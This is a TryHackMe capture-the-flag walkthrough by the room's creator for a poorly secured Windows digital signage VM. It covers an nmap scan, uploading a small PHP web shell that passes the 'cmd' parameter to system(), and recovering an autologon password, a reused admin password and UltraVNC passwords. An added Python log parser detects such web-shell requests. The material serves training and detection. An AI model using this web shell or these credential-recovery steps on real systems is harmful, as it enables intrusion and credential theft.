TryHackMe: All Signs Point 2 Pwnage
TryHackMe: https://tryhackme.com/room/allsignspoint2pwnage
Intro
This is the first TryHackMe room I have created; it tries to emulate a rushed and poorly secured Windows Digital Signage system.
Task #1 - Enumeration
How many TCP ports under 1024 are open
For this we will use good old nmap. Unfortunately, the VM takes up to 15 minutes to boot and for its services to start.
nmap -Pn -p0-1024 {MACHINE-IP}
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-14 17:56 GMT
Nmap scan report for allsignspoint2pwnage (10.10.161.50)
Host is up (0.069s latency).
Not shown: 1019 closed ports
PORT STATE SERVICE
[ REDACTED ]
What is the hidden share
Accessing a service listed above, we find a note. Using this note and knowledge of Windows sharing, we can guess that the share is
[REDACTED]$
Task #2 - Foothold
Using the hidden share we can upload a PHP script, which we can then access via http://machineip/images/. It may take several attempts to find a PHP script that will work, because Windows Defender detects and deletes them.
<?php
echo "You entered <pre>" . $_GET['cmd'];
system($_GET['cmd']);
?>
What user is signed into the console session
Using the above script and the quser command we can see the users logged in.
quser
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>[REDACTED] console 1 Active none
What hidden share is only remotely accessible as an administrative account
Using the net share command we can see what other shares exist.
[REDACTED]
What is the content of user.txt
Using the PHP script we can copy the file from the user's desktop:
thm{[REDACTED]}
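The requests made in this task, a PHP file under /images/ called with a cmd parameter, leave a recognisable trace in the web server's access log. The following is an added detection example, not part of the original write-up or the room: it assumes Common/Combined Log Format logs, and the sample lines, file name x.php and IP addresses are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: the web server writes Common/Combined Log Format access logs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
# Extensions that should never be requested from a folder meant to hold images.
SCRIPT_EXT = (".php", ".phtml", ".phar", ".php5")
# Commands the write-up runs through the script (quser, net share, copying a file).
CMD_RE = re.compile(r'\b(quser|net\s+share|copy|type)\b', re.I)

# Constructed sample log lines (not captured from the room).
SAMPLE_LOG = """\
192.0.2.10 - - [14/Nov/2020:18:01:02 +0000] "GET /images/banner1.jpg HTTP/1.1" 200 48211
192.0.2.66 - - [14/Nov/2020:18:05:40 +0000] "GET /images/x.php?cmd=quser HTTP/1.1" 200 312
192.0.2.66 - - [14/Nov/2020:18:06:11 +0000] "GET /images/x.php?cmd=net%20share HTTP/1.1" 200 540
192.0.2.10 - - [14/Nov/2020:18:07:00 +0000] "GET /index.html HTTP/1.1" 200 1200
192.0.2.66 - - [14/Nov/2020:18:08:30 +0000] "GET /images/logo.png?v=2 HTTP/1.1" 200 9001
"""

def find_webshell_hits(log_text, prefix="/images/"):
    """Return (ip, path, status, reasons) for requests under prefix that look like script execution."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        url = urlsplit(m["target"])
        path = url.path.lower()
        if not path.startswith(prefix):
            continue
        reasons = []
        if path.endswith(SCRIPT_EXT):
            reasons.append("script-extension")
        # parse_qsl percent-decodes values, so cmd=net%20share is matched as "net share".
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if CMD_RE.search(value):
                reasons.append(f"command-in-{name}")
        if reasons:
            hits.append((m["ip"], url.path, m["status"], reasons))
    return hits

if __name__ == "__main__":
    for ip, path, status, reasons in find_webshell_hits(SAMPLE_LOG):
        print(ip, path, status, ",".join(reasons))
```

A 200 status on a hit means the script was still on disk and executed; a later 404 for the same path is consistent with Defender having removed it.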
Task #3 - Pwnage
This task is basically to highlight some of the mistakes that can be made and where useful information can be found.
What is the Users Password
The desktop is set to log in automatically. There are a couple of ways of doing this, but on this box the registry is used.
[REDACTED]
What is the Administrators Password
The hidden share above contains the installation files used by the technician to set up the system. It looks like the Admin password is set to the same value on the machines they configure, in order to be able to run scripts.
What executable is used to run the installer with the Administrator username and password?
The script above containing the password uses a command so that the password does not need to be entered manually. The executable is also contained in this folder.
What is the VNC Password
UltraVNC is installed on the machine. It stores its password encrypted in an ini file. This can be found in the install directory (C:\Program Files...) and also in the directory above.
[ultravnc]
passwd=[REDACTED]
passwd2=[REDACTED]
[admin]
UseRegistry=0
SendExtraMouse=1
Secure=0
The file contains 2 passwords: the first is the admin login, whilst the second is the view-only password. Some research via Google returns vncpwd, downloadable from http://aluigi.altervista.org/pwdrec.htm, which can be used to decode the encrypted password.
What is the contents of the admin flag
This is on the Administrator's desktop.
Thoughts/Credits
This is the first room I have created and I had fun doing so. Writing the webpage took me a bit longer than I thought and reminded me how much I dislike JavaScript.
Hopefully, running through this box you have learnt something that you can use in future.
I would like to thank BigMark82 and RockShox my partners in crime. Also shout out to r1gormort1s for encouraging me to make a room, check their room StartUp which was fun to do.